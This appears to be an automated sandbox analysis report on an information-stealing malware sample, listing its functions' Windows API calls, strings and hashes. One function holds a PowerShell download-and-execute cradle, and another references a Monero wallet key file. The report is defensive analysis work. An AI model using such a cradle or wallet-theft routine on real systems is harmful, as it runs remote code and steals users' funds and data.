                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: f9d90880eb01b7b61ee1545441443ab6a3b5aa6b67e6adda5dba22b8ba2029c6
                        • Instruction ID: b325016ee68c54c5fc094fab0e4deb04cd9161abe2c36bdeb7cf649d6ce5e808
                        • Opcode Fuzzy Hash: f9d90880eb01b7b61ee1545441443ab6a3b5aa6b67e6adda5dba22b8ba2029c6
                        • Instruction Fuzzy Hash: 67F08934904209EFE3449FE1E90972C7B70FB08703F0801ABF60DA7290D6754B85EB96
                        Function 00C44FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C44FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C44FD1
                        • InternetOpenA.WININET(00C60DDF,00000000,00000000,00000000,00000000), ref: 00C44FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C45011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C45041
                        • InternetCloseHandle.WININET(?), ref: 00C450B9
                        • InternetCloseHandle.WININET(?), ref: 00C450C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 7d38e18293d59a7d22bda52ae20b3011e3628c4ca4698a0c45ae5c6f7c3e53e9
                        • Instruction ID: 5ca092b3b12aa23880974b86ea9e7f1093c330cf754185002d7ce4b392d646c1
                        • Opcode Fuzzy Hash: 7d38e18293d59a7d22bda52ae20b3011e3628c4ca4698a0c45ae5c6f7c3e53e9
                        • Instruction Fuzzy Hash: 5E3106B4A00218ABDB20CF55DC85BDDB7B4FB48704F5081E9EA09B7281D7706EC99F99
                        Function 00C583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C58426
                        • wsprintfA.USER32 ref: 00C58459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C5847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58499
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,008A0000,00000000,000F003F,?,00000400), ref: 00C584EC
                        • lstrlen.KERNEL32(?), ref: 00C58501
                        • RegQueryValueExA.ADVAPI32(00000000,0089FF40,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C60B34), ref: 00C58599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 98d7546e327cbaaa89224797ac3b4d76885264f9de6982ce038ed3293366bccd
                        • Instruction ID: 9fe61e4ff0df24f882487acf3a0abb3ed00495cb01e3a9497c35cb63d0046267
                        • Opcode Fuzzy Hash: 98d7546e327cbaaa89224797ac3b4d76885264f9de6982ce038ed3293366bccd
                        • Instruction Fuzzy Hash: A5210AB59002189FEB24DB55DC85FE9B3B8FB48701F04C5A9A609A6140DF71AAC9CFE4
                        Function 00C57690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C576A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C576AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0088E2E8,00000000,00020119,00000000), ref: 00C576DD
                        • RegQueryValueExA.ADVAPI32(00000000,008A0180,00000000,00000000,?,000000FF), ref: 00C576FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C57708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 5cfae272781e366d1aeb322ceafdb95519ff4bcfa997aaa41a3d30725febdd1f
                        • Instruction ID: f69688e7c8f5af68dd57e5205784a1c8e8f1e28e84e15af9b590b8255b0cd908
                        • Opcode Fuzzy Hash: 5cfae272781e366d1aeb322ceafdb95519ff4bcfa997aaa41a3d30725febdd1f
                        • Instruction Fuzzy Hash: 6A0184B8A00204BFEB00DBE1EC4DF6D77B8EB08701F144166FE08E7190D67499488B51
                        Function 00C57720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C5773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0088E2E8,00000000,00020119,00C576B9), ref: 00C5775B
                        • RegQueryValueExA.ADVAPI32(00C576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C5777A
                        • RegCloseKey.ADVAPI32(00C576B9), ref: 00C57784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 79175fda7d8247d2aef6d7fd185572efd443347d595e77d79b95005d79a91470
                        • Instruction ID: 11da7af5c504e619c141e7fff7ca11e27b21054f14c1629c8e7654ac6c0ffd6d
                        • Opcode Fuzzy Hash: 79175fda7d8247d2aef6d7fd185572efd443347d595e77d79b95005d79a91470
                        • Instruction Fuzzy Hash: 9C01A7B9A00308BFE710DBE1DC4AFAEB7B8EB08701F044166FA08B7281D67056448B61
                        Function 00C499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                        • LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 47f854c056441461643bcf03cc5ab84e49a89767a0588cc11824023c20aa800b
                        • Instruction ID: c04c975929a4f1438bf1b9a527b765d3f723c39e139106ec68ecc16eaec5bd1b
                        • Opcode Fuzzy Hash: 47f854c056441461643bcf03cc5ab84e49a89767a0588cc11824023c20aa800b
                        • Instruction Fuzzy Hash: 9F314BB4E00209EFDB14CF95C889BAEB7B5FF48300F148159E915A7290D778AA85DFA1
                        Function 00C54780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,008A03C0), ref: 00C547DB
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54801
                        • lstrcat.KERNEL32(?,?), ref: 00C54820
                        • lstrcat.KERNEL32(?,?), ref: 00C54834
                        • lstrcat.KERNEL32(?,0088D6A8), ref: 00C54847
                        • lstrcat.KERNEL32(?,?), ref: 00C5485B
                        • lstrcat.KERNEL32(?,0089FB48), ref: 00C5486F
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58D90: GetFileAttributesA.KERNEL32(00000000,?,00C41B54,?,?,00C6564C,?,?,00C60E1F), ref: 00C58D9F
                          • Part of subcall function 00C54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C54580
                          • Part of subcall function 00C54570: RtlAllocateHeap.NTDLL(00000000), ref: 00C54587
                          • Part of subcall function 00C54570: wsprintfA.USER32 ref: 00C545A6
                          • Part of subcall function 00C54570: FindFirstFileA.KERNEL32(?,?), ref: 00C545BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 0341293669257bf2a3ef391d6c86ab6b1872b52700e98c653c9f43626d7e3c35
                        • Instruction ID: d851348fee22da481a8acd49a2a118070484ee0bc3ea90bd569f244eb21ca8fa
                        • Opcode Fuzzy Hash: 0341293669257bf2a3ef391d6c86ab6b1872b52700e98c653c9f43626d7e3c35
                        • Instruction Fuzzy Hash: 2231A2B69002086BDB14FBB0DC86EED737CBB48300F444599B719A6081EE7497CDDBA5
                        Function 00C52C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C52D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C52CC4
                        • <, xrefs: 00C52D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C52D04
                        • ')", xrefs: 00C52CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: a822054ed8331d7c5ac381dda5d02ff4329919402cd42273e871491342201a1c
                        • Instruction ID: 3b7156c34c01fcf1ad43d60c76650ae534ccc8aaebca6be0fe5c1e36b9974fbf
                        • Opcode Fuzzy Hash: a822054ed8331d7c5ac381dda5d02ff4329919402cd42273e871491342201a1c
                        • Instruction Fuzzy Hash: EF41EE75C102089ADB14EBA2C892BDDBB74BF14301F504229E916B61D1EF742ACEDF99
                        Function 00C49E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C49F41
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 9941f96dde22c7aea7bcbb81f25b5dcf7dae8aa3cd8741fde628cd3e4b581086
                        • Instruction ID: 0793c2cb70bde1a6555305a2aafde97ef7531f73b34a334fd84b7a8299f8ae11
                        • Opcode Fuzzy Hash: 9941f96dde22c7aea7bcbb81f25b5dcf7dae8aa3cd8741fde628cd3e4b581086
                        • Instruction Fuzzy Hash: 6E616E74A00208AFDB24EFA5CC96FEE7775BF44340F048118FD0A5B191EB706A4ADB56
                        Function 00C540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0089FB68,00000000,00020119,?), ref: 00C540F4
                        • RegQueryValueExA.ADVAPI32(?,008A02B8,00000000,00000000,00000000,000000FF), ref: 00C54118
                        • RegCloseKey.ADVAPI32(?), ref: 00C54122
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54147
                        • lstrcat.KERNEL32(?,008A02E8), ref: 00C5415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
